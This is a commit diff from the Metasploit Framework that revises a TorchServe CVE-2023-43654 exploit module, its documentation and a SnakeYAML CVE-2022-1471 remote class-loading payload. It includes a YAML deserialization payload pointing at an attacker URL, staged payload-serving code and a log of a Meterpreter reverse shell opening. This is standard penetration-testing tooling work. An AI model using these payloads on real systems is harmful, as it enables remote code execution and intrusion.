Address comments from the review

rapid7 · Oct 12, 2023 · 86b7ec4 · 86b7ec4
1 parent de8e392
commit 86b7ec4
Show file tree

Hide file tree

Showing 5 changed files with 27 additions and 14 deletions.
diff --git a/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md b/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md
@@ -33,20 +33,21 @@ PAYLOAD => java/meterpreter/reverse_tcp
 msf6 exploit(multi/http/torchserver_cve_2023_43654) > set LHOST 192.168.159.128
 LHOST => 192.168.159.128
 msf6 exploit(multi/http/torchserver_cve_2023_43654) > run
+
 [*] Started reverse TCP handler on 192.168.159.128:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
-[*] Using URL: http://192.168.159.128:9090/exploit/
+[*] Using URL: http://192.168.159.128:9090/VLz5xafKtJOjBAv/
 [*] Registering the model archive...
 [+] Sending model archive
-[*] Sending stage (59909 bytes) to 172.17.0.2
-[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 172.17.0.2:39480) at 2023-10-05 16:13:54 -0400
+[*] Sending stage (57692 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:49662) at 2023-10-12 09:19:30 -0400
 [*] Server stopped.
 
 meterpreter > getuid
 Server username: model-server
 meterpreter > sysinfo
-Computer        : 4dbcfe5cc11c
+Computer        : 187de8da4e1b
 OS              : Linux 6.2.15-100.fc36.x86_64 (amd64)
 Architecture    : x64
 System Language : en_US

diff --git a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
@@ -1,4 +1,4 @@
-// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
+// javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java
 import javax.script.ScriptEngine;
 import javax.script.ScriptEngineFactory;
 import java.io.IOException;

diff --git a/external/source/exploits/CVE-2022-1471/README.md b/external/source/exploits/CVE-2022-1471/README.md
@@ -1,17 +1,25 @@
 # Overview
-The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
-CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
+exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+
+See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.
 
 ## Compiling
-Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
+It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the 
+[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
+files.
+
+Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.
 
 ## Usage
 Trigger the deserialization using the following YAML:
 ```yaml
-!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
+!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
 ```
 
 Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
 contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
 `Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
 deliver a Metasploit payload.
+
+[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java
diff --git a/lib/msf/core/exploit/remote/java/http/class_loader.rb b/lib/msf/core/exploit/remote/java/http/class_loader.rb
@@ -63,21 +63,22 @@ def on_request_uri(cli, request)
     case resource
     # Stage 1
     when "#{class_name}.class"
-      vprint_good('Sending constructor class')
+      vprint_good('Sending the constructor class')
       # This contains the constructor that will call our JavaPayload
       res = constructor_class
     # Stage 2
     when 'metasploit/Payload.class'
-      vprint_good('Sending payload class')
+      vprint_good('Sending the main payload class')
       # This is our JavaPayload as a compiled class
       res = MetasploitPayloads.read('java/metasploit/Payload.class')
     # Stage 3
     when 'metasploit.dat'
-      vprint_good('Sending payload config')
+      vprint_good('Sending the payload configuration data')
       # This tells the target how to address the payload; this is the magic!
       res = payload_instance.stager_config
     # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp
-    when /^javapayload\/stage\/(Shell|Stage|StreamForwarder)\.class$/
+    when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/
+      vprint_good("Sending additional payload class: #{resource}")
       res = MetasploitPayloads.read("java/#{resource}")
     else
       vprint_error('Sending 404')

diff --git a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
@@ -70,7 +70,8 @@ def check
     end
 
     version = res.get_json_document.dig('info', 'version')
-    return Exploit::CheckCode::Safe unless version.present?
+    return Exploit::CheckCode::Detected unless version.present?
+
     unless Rex::Version.new(version) < Rex::Version.new('8.0.2')
       return Exploit::CheckCode::Safe("Version #{version} is patched.")
     end
@@ -144,6 +145,8 @@ def exploit
   def cleanup
     super
 
+    return unless @model_name
+
     # see: https://pytorch.org/serve/management_api.html#unregister-a-model
     send_request_cgi({
       'method' => 'DELETE',